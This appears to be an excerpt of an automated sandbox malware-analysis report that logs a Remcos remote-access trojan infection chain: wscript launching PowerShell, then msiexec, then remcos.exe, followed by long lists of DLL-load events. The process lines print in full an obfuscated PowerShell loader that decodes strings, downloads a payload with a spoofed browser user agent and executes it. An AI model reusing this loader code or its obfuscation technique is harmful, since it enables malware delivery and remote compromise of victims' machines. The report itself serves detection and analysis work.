Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: unknownProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: unknownProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetArugeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe" Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: msi.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: version.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: msi.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: version.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: msi.dllJump to behavior
